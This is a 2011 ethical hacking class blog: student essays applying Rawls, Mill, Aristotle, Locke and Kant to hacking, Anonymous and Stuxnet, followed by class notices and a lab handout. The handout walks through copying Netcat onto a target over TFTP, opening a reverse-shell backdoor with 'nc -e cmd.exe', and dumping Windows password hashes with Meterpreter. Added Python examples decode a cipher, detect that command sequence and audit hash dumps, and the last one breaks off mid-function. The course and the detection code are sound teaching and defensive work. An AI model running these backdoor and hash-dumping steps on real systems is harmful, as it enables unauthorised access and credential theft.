Thursday, December 15, 2011

Hackers and Moral Desert (not a sweet treat)

The concept of moral desert is a complicated one. Moral Desert states that a person is obligated to something because of something else (the dog gets a biscuit because he's been good), and that result can be either good or bad; the person must accept all consequences be they positive or negative. The actual theory is more complex and the Stanford Encyclopedia of Philosophy gives a much more in-depth explanation (trying to explain it fully here would go way over the maximum word count, so I'll just mention the site).

This theory was famously rejected by the philosopher John Rawls. Rawls claimed that a person's talents were simply the result of a 'natural lottery' and so a given individual could not claim credit for and does not morally deserve the results of said talents (better job/salary, award, etc.); he does clarify that while he does not accept the underlying concept of moral desert, people can and should expect to receive positive--and only positive--benefits from talent (he calls this 'Legitimate Expectation'). Where the legitimate expectation argument seems to fail is that it states that one only deserves to take credit for results if the individual or group expected them to happen, and the only results that count are positive.

In applying this concept to hacking, a person may not expect the results of an action but it happens anyway. Is it then moral to claim credit for those results? According to the basic moral desert framework, yes. In today's world, where exploits can be found with a Google search and skill isn't necessarily required to make use of some powerful tools, not unless the person personalized the results in some way (tweaking source code and adding in a signature, adding a message to a defaced site, etc.) so that everyone would know it was them. Hacking results are only claimed by an individual or group if the results are positive (when was the last time you heard of Anon, LulzSec or the like taking credit for a failure?).

When I was in high school, the 'IT department' (one librarian who believed anything on a computer worked exactly the way it was supposed to) used a fairly simple keyword filter with a bad bit of code. It blocked sites based on keywords with no context, resulting in students unable to do research assignments because the filter was blocking a lot of stuff it shouldn't.

I was able to get the password through simple shoulder-surfing (I was just curious and did not expect to be able to actually get the master password). So I disabled the filter when I had an in-class project that otherwise would have been impossible. One teacher saw me doing this and assumed IT had trusted me with the password; I later told her that was not the case. She asked how I got it; I told her, gave her the password, she gave it to a couple other teachers and students were happy. Everyone behaved (the students didn't directly have the password, only teachers) and there were no logs to check. This fails the 'legitimate expectation' argument that Rawls gives, as I used knowledge (not 'natural lottery') to gain these results, but I had no real expectation of being able to circumvent the filter. Nor did I expect or even want credit; I figured that the librarians would probably find some reason to ban me from the computer lab altogether if they found out.

Another possible example of the moral desert theory is the Harvard admissions hack. Prospective students replaced a character string in a URL, and thus were able to view their admissions status in advance. Could it be considered an 'immoral' advantage? Not knowing the whole story, I would think that it depends. If an applicant viewed only their own information while waiting for the letter to arrive in the mail, I would not see that as an unfair advantage as the outcome was already certain. Some might.

You could argue that the person who discovered this flaw in the system did not expect to gain access (the expectation is that databases like that with sensitive information are protected by a password or other barrier to entry from the outside), but we don't know if that is in fact the case. Once the info was published, everyone expected to get in, so that might fall under 'legitimate expectation' (however wrong it may be). However, anyone using the hack must be prepared for the negative consequences as well as the possible positives (moral desert).

John Stuart Mill and Jeremy Bentham - Enjoy the occasional hack.

What would John Stuart Mill and Jeremy Bentham say about hacking?

An interesting idea, and certainly one worth taking a look at. For this blog post, I am focusing on two of the strongest driving forces behind the ideas of Utilitarianism. Utilitarianism is the idea that the proper action, the moral action, is the one that maximizes overall happiness. Bentham states that there are two “sovereign masters” governing mankind, pain and pleasure, and Bentham believes that the proper action would be one that maximizes overall pleasure while minimizing overall pain. This concept stems from the idea of consequentialism, which states that the morality of an action can be determined only from the outcome of said action. This differs from Kant’s idea of the categorical imperative, which can be summed up by saying that some actions, regardless of outcome, are moral or immoral. To really get an idea of these concepts in action, let me employ a lovely example I came across in one of Michael Sandel’s lectures.


Imagine you’re walking along a bridge and you spot a runaway train; it’s zooming along the track, the brakes don’t work, and Denzel Washington is nowhere to be found (if you don’t understand the joke, don’t be discouraged. I assure you it wasn’t that funny anyway). A good distance down the track are five unaware train workers, doing train worker things to the track. Imagine that it is inevitable - if nothing is done, these five train workers are going to die miserable, painful deaths. Now, imagine on that very bridge, an incredibly large man is leaning over the railing directly above the train’s track. You realize that you can save all five of those train workers’ lives if you just push the large man over the railing, and onto the track. This incredibly large man would inevitably die a most unfortunate death, but in the process he will have saved five other people’s lives. So what do you do - do you choose to send one man to his death to save five people, or do you choose to let the train kill the five workers and let the fat man lean against the railing in peace?

The utilitarianist would keep it simple and state that five lives without pain and one life with pain is better than five lives with pain and one without pain, and without much hesitation, send the fat man plummeting to his inevitable end. Obviously, somebody who follows Kant’s idea of categorical imperative would let the five men die, because regardless of whether 5 men die or 1 man dies, this philosophy states that sending a man to his death is, without question, immoral, and thus the wrong decision.

So now that we know how Bentham and Stuart Mill would act in that scenario, what can we assume about their stances on hacking? I believe that both of these gentlemen would support hacking as long as it follows the basic tenets of utilitarianism -- there must be more overall happiness after the hacking than before. Let’s delve into a few scenarios and see the stances they’d take.

Would Bentham/Stuart Mill be okay with hacking into somebody’s wireless network? It depends - if the hacker isn’t in any way infringing on the owner’s speeds, or data privacy, I don’t think they would have a problem with this. Pleasure is gained from free Internet, and if the owner’s experience does not change post-hack, he/she does not feel any pain. If you take a step further, it might be argued that the people who profit from the Internet service provider’s income may suffer, so depending on how much the ISP stands to lose from this hack, Bentham and co. might not approve of the hack.

Would Bentham and co. approve of hacking a child pornography website? Absolutely. Without a doubt these people would view distributors and producers of child pornography as incredible sources of pain for children and families, and to prevent them from creating any more pain, thus minimizing pain and increasing overall happiness, they would hack the website (Stuart Mill has 1337 h@ck3R sk1llz, after all).


And for my final example, would BeneMills approve of hacking Microcenter’s website because he doesn’t like their prices and the manager was a big jerk to him? I believe they would not - they would see that while it may produce a considerable (very, very, very considerable) amount of pleasure for the hacker, it would cause much more pain for customers, workers, and anybody who stands to profit from the website’s operation.


In conclusion, I believe that our friends Bentham and Stuart Mill would approve of hacking - but only after they have analyzed the resulting outcome of said hacks.

Oops!

In my half-awake stupor I forgot to thank both Jamie and Monica for taking us out to lunch. It was awesome and much appreciated. So thank you guys, and thanks for making the class enjoyable and engaging!

John Rawls is Anonymous

John Rawls believed that the greatness your future may or may not behold stems solely from the things you were taught and the talents you were given at birth, and as a child. John Rawls's philosophy is that even with meritocracy you will never be put ahead of someone who is naturally talented. You were either born into a family that raised you to be successful or you were not. However, John Rawls mentions that even those who are naturally talented can not claim credit because their success may rely on factors such as birth order.

John Rawls also thought that being paid insane amounts of money to do something you were born talented at is unfair, unless you were using some of that money to give back to the people who lack talent in such things. For instance, in the lecture they compared the salary of Supreme Court judge Sandra Day O’Connor ($200,000) with the salary of television’s Judge Judy ($25 million). To no surprise, John Rawls would not approve of the pay difference. When I heard John Rawls's take on the greed and wealth of talented people, it made me think about what his opinion would be toward the current actions of Anonymous. I wonder, if he were still alive, whether he would reject the protesting or support it. Based off what I learned from the lecture, I think John Rawls would want to take part in the protesting and would support the Occupy groups. John Rawls was most likely ashamed by present day America with all the overpaid athletes and bonehead celebrities. Although, in many instances his theories prove correct. The rich are richer and the poor are getting poorer.

However, I believe that groups such as Anonymous would give John Rawls hope, and maybe even put his theories to the test. Anonymous is a public group of secret members, who claim to be activists for freedom and truth. They claim to be ideas without origin. It started with an image board in Japan. Then they created an image board in English (4chan), where Anonymous only grew in numbers. Anonymous, as I mentioned, is public and completely diverse, holding members of various skill sets; though some are childlike and immature, there are also educated and skilled members. Anonymous has been known for actions such as stealing private information, and taking down inappropriate websites for justice. I don't fully agree with the idea that hard work will never compare to natural talent. Also, the idea that people who come from impoverished families should be given charity by wealthy families. In most cases that theory may hold truth, but not all. I think John Rawls needed to put more faith in the underdog.

I personally think John Rawls would be proud of the current cover of Time magazine (Person of the Year: The Protester). I feel John Rawls almost thought of life as a race: it all depends on where you start that determines the outcome of how far you will go. That's why I believe he would be proud of the “underdogs” for fighting against the greed and ridiculous wealth that belong to a select few. John Rawls seemed like he was all about the idea that the talented and wealthy can have tons of money, as long as they help the less fortunate. Many wealthy Americans do give back to the community by giving to charities, but there are also many wealthy people who could care less. I am not sure how John Rawls would feel about all the hacking Anonymous does.

In conclusion, John Rawls believed that the success in your life is determined by your beginning and that no matter how hard you work, the person with the “easier” beginning, or farther start, will end up ahead of you. Which I do not believe. Also, John Rawls believed that natural talent was more efficient than motivation and effort. John Rawls also believed that the wealthy should have to give some of their money to the less fortunate, because they can not take credit for their natural talent. I mentioned that I personally believed John Rawls would find Anonymous and the Occupy groups intriguing, because they are joining together to fix what they see as wrong in the world.

Aristotle and Anonymous

The hacker ethic is closely related to the virtue ethics found in the writings of Aristotle. Aristotle’s Nicomachean Ethics suggests there is an ultimate good toward which, in the end, all human actions ultimately aim. Virtue Ethics refers to the philosophy that emphasizes being, rather than doing. This means that morality stems from how a person identifies his/her motivations for the action, and the character inherent in that person, and not from the actions of that person alone. Ethical choices and examination must be made in each individual situation, based on factors such as personal vs. social (group) benefit, and what intentions are present in the person(s)… are they well meant or malevolent? Anonymous is a complex example to examine because by its very nature, it consists of a group of persons of unknown identity, who, despite claiming altruistic intention, may in truth be carrying out actions that benefit a smaller chosen group, although they claim to seek justice for others… or they may be as they seem. In truth, that may fluctuate at every moment, as it is a “many” and not a “one”.

Anonymous was formed on the imageboard 4chan, primarily a place to chat and post images and rambling text (often incoherent or offensive… at this point I’d like to shout out to the /b/tards!). They act at times like a hive mind with no openly recognized leaders, choosing to encourage and inspire group action under an anonymous fictional figurehead (as shown by their logo, a suited figure without a head, instead there is only a question mark, standing in a stance of authority in front of a globe). Starting somewhere around 2006, members of this collective have collaborated through anonymous Internet Relay Chat (IRC), where they communicate in group chats and send each other private messages. There is also the capability to exchange files via FTP/file transfers via IRC. IRC creates a decentralized “war room” in which ideas are exchanged, agreements are made as a group, and plans may be deployed. Actions that follow include DDoS attacks, the public posting of group information mining efforts, exposing as many details as possible to the public eye about offending groups, people or corporations, including security flaws and exploits of websites that may be used by any and all, to create further breaches and attacks. The factor of anonymity and the group collective effort of many (“We are Legion”, they proclaim) can have strong influence on certain social groups in today’s society.

The idea that Anonymous represents is ethical. They represent a symbolic figurehead, an inspiration and identification symbol by which to organize actions with intent towards acts of activism via hacking, or “hacktivism”. Individuals within the whole collective operate in a non-centralized, collective manner that insists on overall agreement in order for such action to succeed despite any petty differences or disagreements, with members working together in order to accomplish set goals. In addition, they put out the call for others to join, adding further strength in numbers. But the question is - is crashing a website, or denying people access to the information or function of it, a morally justified means of protest? Is putting the personal information of a person who has committed a perceived wrong out there helpful? I bring up the case of the “pepper spray cop”, John Pike… are the efforts of publishing his information, that result in lots of pizza, male escorts and such being sent to his home, that he shares with a family who are not at fault, worth it as a form of protest? Is it worth it if only to shame HIS unethical behavior, and do we consider the demoralizing effect this may have on innocent members of his family? In John Pike’s case alone, Aristotle would argue for Distributive Justice… in essence, that people should get what they deserve. In Pike’s case, it could be argued that he “deserves” less respect, authority, and dignity or pride. Certainly it can be said, that despite the resulting actions being petty, they strip away his dignity and lower the reflection upon him of those traits I have just mentioned. When considering this protest, or any other, the moral reasoning of the protest should be examined. If that action is deemed to NOT fit in the reasoning, and instead commits a wrong to the target by way of the action, then that act of protest should seem morally wrong.
Aristotle’s virtue ethical theory focuses only upon the agent of the chosen action. The actions of a single individual in such an act of protest, compared to the relative morality of the rest of the world, may not be considered ethical, but the scale of justice shifts when it is a mass, faceless collective. It becomes easy to understand them as the Everyman. This gains sympathy – who doesn’t want to see a “bad guy” come to his just deserts, after all?

Wednesday, December 14, 2011

Ethics Blog Post (Exactly 800 Words)

John Locke (even though I disagree with John Locke on many issues, I agree with natural rights) was a 17th century philosopher that influenced many other social thinkers, political philosophers, and economic theories from all walks of the spectrum. His theories can be applied to a concept that he wouldn’t be so far from: property rights in the modern era.

Property rights in the modern age seem to be dwindling, and no, I’m not talking “Me Hate Taxes, Taxes Bad GRR”; I’m talking about modern day electronic devices and digital content, where the concept of ownership seems to be becoming less than that of the Native Americans. Where and when will people finally see that when you buy an electronic device where you can only do certain things with it “or else”, you don’t really own a product, you are merely leasing it? It’ll probably be when you can’t just smash the device with a shovel for being an ineffective piece of shit without having the manufacturer sue you for improper use. EULAs are turning purchases into leases, destroying property rights.

Take the Sony case, for an example, where jailbreaking (modifying) a PlayStation and telling people how to do it could bring on a lawsuit. This brought an outrage in me: if I rented a car and caused damage to it or modified it against their wishes, the rent-a-car company could bring a lawsuit against me and would be completely just in doing so. But if I bought a car and modified it, the car salesman or even the car manufacturer could not sue me. John Locke claimed before and would claim today that a civil society was created for the protection of property. Property is what is one’s own. That even in the sense of the law (as in if someone broke into my house they would be stealing my PS3, not Sony’s PS3) I would own that PlayStation but I could not modify it; even without causing real harm to others, I could be punished for my actions.

Yes, companies deserve a say in what you do with your product ON THEIR systems, just like the state has a say in what you can drive on public roads, and a store has a say in what they will sell. Sony could ban any user that jailbreaks their PS3 from the PlayStation Network without anyone’s property rights truly being infringed upon. This all falls under natural rights; John Locke could compare this action to another action in his time, such as a traded horse with a contract to the new owner that as long as the new owner does not needlessly beat the horse he could ride the horse on the trader’s property, but if the new owner needlessly beats his horse he no longer can ride his horse on the trader’s property.

Digital content isn’t owned; it is rented with a one-time fee. And I’m not talking about copyrights; people deserve credit and payment for their work. I’m talking about purchased digital content where your ownership can be revoked for as simple a reason as they sold it to you for a couple dollars less than they should have. Yes, I am referring to the Kindle books that were deleted from people’s Kindles by Amazon (ironically it happened to books by George Orwell, Animal Farm and 1984, among others) after they had already paid for the book. This wouldn’t happen in John Locke’s time, and comparatively John Locke would see this as a giant abridgment of property rights: one’s labor exchanged for value, and that value traded for goods which then become one’s property.

Imagine a scene like this occurring in John Locke’s time: John Locke purchases a book for 10 shillings, he reads it, enjoys it, and when he is halfway through the man that sold him the book runs up to him, takes the book right out of his hands and gives back the 10 shillings (for one of many various reasons: sold too cheaply, wasn’t an authorized version, etc.), which went completely outside of the agreement the men had (Amazon’s ToS). With the government sitting idly by, just allowing this to occur, it wouldn’t truly be an ideal society or a Civil Society.

Property in the digital age is truly becoming a dying concept; the day will come where true ownership of electronic devices and of property on digital devices becomes a thing of the past, where you do not own an object, you just paid a one-time fee to be allowed to use it. That is the future we face unless we extend current property rights protections to digital content and electronic devices.

OOOO Nooooooo, I am currently not at exactly eight hundred words; I now only have two more words to write right now.

Screw Flanders.

Tuesday, December 13, 2011

Thursday 12/15!

Meet at Chow Thai Cafe at 2:00 PM! Yes, 2:00! If you can't come until 2:30, fiiiiine, we'll start having fun without you.

Make sure you make your final ethics blog post by 11:59 on Thursday. This is more than half of your ethics grade for the course; as a result this is more than 1/6 of your TOTAL final grade for the course. SO DO THE %$#%(% PROJECT!

Monday, December 12, 2011

Last Call....

It is officially the LAST week of classes, and as such I am reminding you that ANY homework assignments you might have missed that are "past due" you should submit by this Thursday, December 15 to receive any credit.

Project 10 we completed in class last week, so if you were in class, you got credit for it. If you missed that class, you will need to complete it on your own and send me a screenshot to receive credit.

Project 11 builds on 10 and is due on Thursday!

Reminder: The test on Chapters 11, 12, and 13 will be tomorrow in class!

Ethics blog

Philosopher Immanuel Kant introduced some interesting characteristics of freedom, necessity, justice and right. The word freedom is a powerful word revolving around free will and choice. Necessity can be based on an act performed in order to prevent a greater evil or harm. What about the Justice in an act that constitutes fairness and is there a moral right revolving in such an act?

My ethical hacking term will be based on two computer worm viruses, Stuxnet and Suter. We all know that malicious viruses can create havoc on computer systems by stealing our data, corrupting our software and just causing a big friggin headache! But what if viruses such as Stuxnet and Suter can be used for ethical purposes? A good example would be launching one of these viruses against so called “rogue nations” who are seeking to build nuclear weapons for their evil intentions.

In September of 2007, Israel launched an air strike in Syria that demolished a suspected nuclear plant. Israeli fighter jets were able to cross into Syria undetected due to a virus called Suter, executed by Israel, which immobilized Syrian radar defenses. A few years later, sometime around November of 2010, Stuxnet was launched against Iran. This virus was used against the Iranians' Natanz nuclear facility, which destroyed at least one thousand of their centrifuges. Stuxnet was not only successful in disrupting Iran's nuclear power plant, but this attack is said to also delay Iran's capability in building a nuclear weapon.

So there’s no question that a malicious virus that we once thought to be a threat against our computerized systems may one day become a savior in dismantling a hostile nation's network and thereby disrupting their nuclear weapons plant.

Now we come to the question of whether or not Stuxnet and Suter were morally right from an ethics point of view. What gives an act its moral worth? Does the moral worth of an action depend on a motive, as in doing the right thing for the right reasons? Was there any justice in sabotaging another country’s computer network? Does the word necessity come into play with a distinct argument that suggests that these viruses were necessary in order to prevent future evil that may one day create unimaginable harm?

We certainly can not predict the future, and some will argue that mere assumptions may not be so valid as to constitute such a right to deliver a virus attack against other countries. But is it better to be safe than sorry? Do we sit back and wait to see Iran’s true intentions of nuclear capability? If so, will we regret later on not taking the necessary form of action to prevent their use of nuclear weapons? Is it morally right to create viruses for the purpose of good when we have always dubbed viruses as malicious code? I guess it all depends on the situation.

Take for example an unethical incident in the country of Estonia: in 2007 that country was literally shut down by an unknown virus code. The virus took down the country's government web sites, banks and other financial firms. This attack is speculated to originate from Russia after a controversial debate on relocating a Soviet era monument within Estonia. Was this virus morally and ethically right over a statue? If so, I see no justice in shutting down a peaceful country who wanted to forget the darkness of communism that once reigned over its sovereignty. Perhaps our comrades had too much vodka and took it overboard?

Regardless, it is possible that malicious code may very well become helpful in dealing with future 21st century technological threats. The creation of such a virus in my opinion certainly has an ironic twist to it and we need to analyze that from certain perspectives. The use of such a virus may now have some good intentions towards preventing something drastic in the near future. One may call it a necessity.

I believe we will witness an extraordinary event involving a virus, which will help save millions or perhaps billions of lives around the world. When it comes to the word virus, we immediately think of a malicious code with potential destruction. But what we really should be asking ourselves is, is it morally and ethically right to launch a virus for good intentions and if so, will it have a moral worth to it? Again, will that moral worth of an act have some kind of motive towards doing the right thing and for the right reasons in hopes of preventing a greater harm from rogue nations? Only time will tell; the great philosopher Immanuel Kant once said “So act that your principle of action might safely be made a law for the whole world.”

Saturday, December 10, 2011

Scams

There's a show on History Channel (HD feed; not sure if it's also on the standard version) right now about assorted scams, how they play out and how/why people fall for them.

Tuesday, December 6, 2011

Give this one a try.

Want to work for British intelligence? All you have to do is crack the code.

http://canyoucrackit.co.uk/index.asp

Scammers work around two-factor authentication

http://slashdot.org/story/11/12/06/0321250/scammers-work-around-two-factor-authentication-with-social-engineering

Not all that surprising, given how lax some people can be with internet securification...

Thursday, December 1, 2011

Chapter assignments!

Don't forget: you're asked to present on one of the chapters on Thursday!

Here is the list of who will present on which chapter:

Chapter 11: Rob, Karl, Joe
Chapter 12: Marie, Isabel, Sean
Chapter 13: Orlando, Vinny, Corey

sodqv

Phhw dw fkrz wkdl fdih iru oxqfk rq ghf 48.
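The two shifted lines above are a Caesar cipher: each letter, and each digit of the date, has been moved three places along. As an added example that is not part of the original post, here is a small Python decoder that tries every key and scores each candidate against a handful of common English words; the word list and the scoring rule are this example's own choices, not anything the post states.

```python
"""Decode the shifted class note ("sodqv" / "Phhw dw fkrz ...").

Added example, not part of the original blog post.  Classic Caesar shift over
letters, extended to digits (mod 10) because the note's date is shifted too.
"""
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase
DIGITS = string.digits

# Small dictionary used to rank candidate plaintexts (this example's own choice).
COMMON_WORDS = {"the", "and", "at", "on", "for", "to", "of", "in", "meet", "lunch"}

# The two ciphertext lines as they appear on the page.
TITLE = "sodqv"
BODY = "Phhw dw fkrz wkdl fdih iru oxqfk rq ghf 48."


def shift_text(text: str, shift: int) -> str:
    """Shift every letter by `shift` places (mod 26) and every digit mod 10.

    Case and punctuation are preserved, so the layout of the note survives.
    """
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + shift) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + shift) % 26])
        elif ch in DIGITS:
            out.append(DIGITS[(DIGITS.index(ch) + shift) % 10])
        else:
            out.append(ch)
    return "".join(out)


def decode(ciphertext: str, key: int) -> str:
    """Undo a Caesar encryption that used `key` (encryption is shift_text(plain, key))."""
    return shift_text(ciphertext, -key)


def score(candidate: str) -> int:
    """Count how many whitespace-separated tokens are common English words."""
    words = candidate.lower().replace(".", " ").split()
    return sum(1 for w in words if w in COMMON_WORDS)


def crack(ciphertext: str) -> tuple:
    """Brute-force all 26 keys; return (best_key, plaintext) by dictionary hits.

    With only 26 possibilities there is no need for anything cleverer than
    trying them all, which is exactly why a Caesar shift offers no secrecy.
    """
    best_key = max(range(26), key=lambda k: score(decode(ciphertext, k)))
    return best_key, decode(ciphertext, best_key)


if __name__ == "__main__":
    key, plain = crack(BODY)
    print(f"key={key}: {plain}")
    print(f"title: {decode(TITLE, key)}")
```

With key 3 the title decodes to "plans" and the body to the lunch meet-up that the 12/13 post announces; the round trip `shift_text(decode(BODY, 3), 3)` returns the original ciphertext.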

Overheard in Ethical Hacking

"The smiley face is an L."

L, for I effing Love this class. Thanks for letting me play and learn with you real computer people this semester.

of interest, and a damn good read

Cryptonomicon by Neal Stephenson

One of my favorite authors, and a great book. Also, related to the topic!

Project 11 - Setting Up a Reverse Shell, Dumping Passwords, and Cracking Passwords

Using Netcat to Set Up a Reverse Shell

Exercise 1: Using Netcat for a reverse shell. In the following exercise, you will use the Meterpreter payload from the previous lab to set up a Netcat listener (AKA reverse shell). This will allow you to remotely control the target system after you close your Meterpreter session and thus come back to the target system whenever you want:
1. The first step in setting up a Netcat listener is to get the Netcat executable onto the target system so it can be used to interact with your attack system. There are a number of ways this can be accomplished. You’ll use Trivial File Transfer Protocol (TFTP) to copy the Netcat executable from your BackTrack system to the target system.

2. In the bottom left of your BackTrack desktop, click the dragon-looking icon/Services/TFTPD/Start TFTPD. This will start the TFTP daemon (or server service) on your BackTrack system. You should get a message that the TFTPD is running on port 69 and the home directory is /tmp. Click the OK button.

3. You are now going to copy the Netcat executable from its default location (/pentest/windows-binaries/tools) to the /tmp directory on your BackTrack system so it can be TFTPed down from the target system. To do so, open a new shell (leave the current Meterpreter shell open) and type the following (type only the command after the prompt):
user1@pentest:~# cp /pentest/windows-binaries/tools/nc.exe /tmp

4. Change into the /tmp directory and list the contents of this directory (type only the command after each prompt):
user1@pentest:~# cd /tmp
user1@pentest:~# ls -al
Look for the nc.exe file in this directory.

5. Leave this shell open.

6. Go to the Meterpreter shell you left open. At the Windows command shell prompt, type the following (type only the command after the prompt):
C:\WINDOWS\system32>tftp -i BackTrack_IP_address get nc.exe
Syntax breakdown:
tftp: program name
-i: specifies the binary image transfer mode (which means to move the binary file byte by byte)
BackTrack_IP_address: IP address of your BackTrack system
get nc.exe: transfers the nc.exe file from your BackTrack system to the target system
If the file transfer was successful, you should see a message similar to this: “Transfer successful: 59392 bytes in 1 second, 59392 bytes/s”

7. Now you will set up both the client and server portions of the backdoor

8. In the second shell you opened in step #3 (not the Meterpreter shell), start the Netcat program on your BackTrack system in listening mode (server mode) by typing the following (only type what’s in bold):
user1@pentest:~#nc -v -l -p 3333
Syntax breakdown:
nc: program name
-v: verbose mode
-l: listen mode (listen for inbound connections)
-p 3333: local listening port on the BackTrack system

9. From the Meterpreter shell (where you have the Windows command shell prompt open on the target system), start the client side of the Netcat backdoor (only type what’s in bold, on one line):
C:\WINDOWS\system32>nc -e cmd.exe BackTrack_IP_address 3333
Syntax breakdown:
nc: program name
-e cmd.exe: program to execute once the connection is made (its input and output are tied to the connection)
BackTrack_IP_address 3333: your BackTrack system’s IP address and listening port for incoming connections
This will shovel a Windows command shell from the target system to your BackTrack system, appearing in the non-Meterpreter shell you opened in step #3

10. Close the Meterpreter shell window (click the X in the upper-right corner of the window)

11. Notice your BackTrack prompt has turned into a Windows command shell prompt. You now have a backdoor into the target system

12. Type (only type what’s in bold):
C:\WINDOWS\system32>dir nc.exe

13. Leave your Netcat listener shell open
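From the defender's side, the two commands this exercise runs on the target (a binary-mode TFTP download of nc.exe, then nc -e cmd.exe dialling out to a listener) are exactly the sequence a host-based detection should catch. The following Python is an added example, not part of the lab, of Netcat or of BackTrack: it scans constructed process-creation records in an assumed timestamp|host|parent|command format (the SAMPLE_EVENTS, the hostnames and the 192.0.2.x addresses are all made up for illustration) and scores the two steps individually and together.

```python
"""Detection for the download-then-backdoor sequence of Exercise 1.

Added example; not part of the lab, Netcat or BackTrack. The log format
(timestamp|host|parent_image|command_line) and the events are constructed
for illustration and stand in for whatever process-creation telemetry a
site actually collects.
"""
import re
from collections import defaultdict

# Constructed sample process-creation records (not from a real system).
SAMPLE_EVENTS = """\
2011-12-15T10:01:02|WINXP-LAB|cmd.exe|tftp -i 192.0.2.10 get nc.exe
2011-12-15T10:01:09|WINXP-LAB|cmd.exe|nc -e cmd.exe 192.0.2.10 3333
2011-12-15T10:05:30|WINXP-LAB|explorer.exe|notepad.exe report.txt
2011-12-15T10:06:00|WINXP-LAB|cmd.exe|ipconfig /all
2011-12-15T11:00:00|FILESRV01|services.exe|tftp -i 192.0.2.77 get update.exe
"""

# Step 6 of the exercise: tftp in binary (-i) mode fetching a file.
TFTP_GET = re.compile(r"\btftp(?:\.exe)?\b.*\s-i\s+(\S+)\s+get\s+(\S+)", re.I)
# Step 9 of the exercise: netcat with -e binding a program to a connection.
NC_EXEC = re.compile(r"\bnc(?:\.exe|at)?\b.*\s-e\s+(\S+)\s+(\S+)\s+(\d+)", re.I)


def parse_events(text):
    """Split the constructed pipe-delimited records into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, cmd = line.split("|", 3)
        events.append({"ts": ts, "host": host, "parent": parent, "cmd": cmd})
    return events


def detect(events):
    """Return findings as (host, severity, description) tuples.

    A binary-mode TFTP download is 'medium' on its own (legitimate use is
    rare on workstations), nc -e is 'high', and both on one host is
    'critical' because that is the full backdoor sequence.
    """
    per_host = defaultdict(lambda: {"tftp": [], "nc": []})
    for ev in events:
        m = TFTP_GET.search(ev["cmd"])
        if m:
            per_host[ev["host"]]["tftp"].append((ev["ts"], m.group(1), m.group(2)))
        m = NC_EXEC.search(ev["cmd"])
        if m:
            per_host[ev["host"]]["nc"].append((ev["ts"], m.group(1), m.group(2), m.group(3)))

    findings = []
    for host, hits in per_host.items():
        for ts, server, fname in hits["tftp"]:
            findings.append((host, "medium", f"{ts} tftp binary-mode download of {fname} from {server}"))
        for ts, prog, dst, port in hits["nc"]:
            findings.append((host, "high", f"{ts} netcat -e ties {prog} to outbound {dst}:{port}"))
        if hits["tftp"] and hits["nc"]:
            findings.append((host, "critical", "tftp download followed by netcat -e on the same host"))
    return findings


if __name__ == "__main__":
    for host, sev, desc in detect(parse_events(SAMPLE_EVENTS)):
        print(f"[{sev:8}] {host}: {desc}")
```

The per-host correlation is the point: either command alone produces noise on some networks, but a TFTP fetch followed by nc -e on the same machine is the complete pattern this exercise builds, and that is what the 'critical' finding keys on.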

Exercise 2: Using Meterpreter to Dump Windows Password Hashes
In the following exercise, you will use the built-in capability of the Meterpreter payload to dump the password hashes of the accounts on your target system. These hashes will be used later in password cracking attempts, with the ultimate goal of obtaining additional usernames and passwords:

1. Close your reverse shell and return to the Meterpreter prompt (only type what’s in bold):
C:\WINDOWS\system32>exit

2. With a Meterpreter shell in place type (only type what’s in bold):
meterpreter > hashdump

3. The contents of the target system’s password hash file are output to the screen.
The passwd file contains user account information and looks as follows:
Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582:::
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904:::
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E:::
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::
Each field is separated by a colon. The fields are:
1st field: username (Administrator, User1, etc.)
2nd field: Relative Identifier (RID): the last 3-4 digits of the Security Identifier (SID), which are unique to each user
3rd field: LM hash
4th field: NTLM hash

4. Based on previous lab techniques, determine a way to get the contents of the hashdump output from your BackTrack system to your Windows attack system

5. Save the file as hashes.txt in the c:\temp folder on your Windows attack system
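Before the hashes go to a cracker (Exercise 3), the dump itself already tells an auditor a lot. The LM hash processes each 7-character half of the password separately, so a second half equal to the constant AAD3B435B51404EE means the password is no longer than 7 characters, and the fixed NTLM value 31D6CFE0D16AE931B73C59D7E0C089C0 is the hash of an empty password. The Python below is an added example (not part of the lab or of Metasploit) that parses the four lines shown in step 3 plus one constructed Guest line and flags those conditions; the Account class, the audit() function and the Guest entry are assumptions of the example, not output from the target system.

```python
"""Audit of a Meterpreter hashdump (pwdump-format) listing.

Added example; not part of the lab or of Metasploit. It parses the lines
shown in step 3 above plus one constructed Guest line and flags what the
hash values alone reveal, before any cracking is attempted.
"""
import re
from dataclasses import dataclass

# LM hashes each 7-character half of the password separately; this is the
# value of a half with nothing in it, so doubled it is also the "no LM hash" value.
LM_EMPTY_HALF = "AAD3B435B51404EE"
LM_EMPTY = LM_EMPTY_HALF * 2
# NTLM hash of the empty password.
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"

# First four lines are from the exercise; the Guest line is constructed.
SAMPLE_HASHDUMP = """\
Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582:::
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904:::
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E:::
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
"""

HEX32 = re.compile(r"^[0-9A-Fa-f]{32}$")


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def lm_stored(self) -> bool:
        return self.lm != LM_EMPTY

    @property
    def empty_password(self) -> bool:
        return self.nt == NT_EMPTY

    @property
    def max_len_7(self) -> bool:
        # Second LM half empty while the first is not: characters 8-14 are absent.
        return self.lm_stored and self.lm[16:] == LM_EMPTY_HALF


def parse_hashdump(text):
    """Parse user:rid:lm:nt::: lines; reject malformed ones loudly."""
    accounts = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
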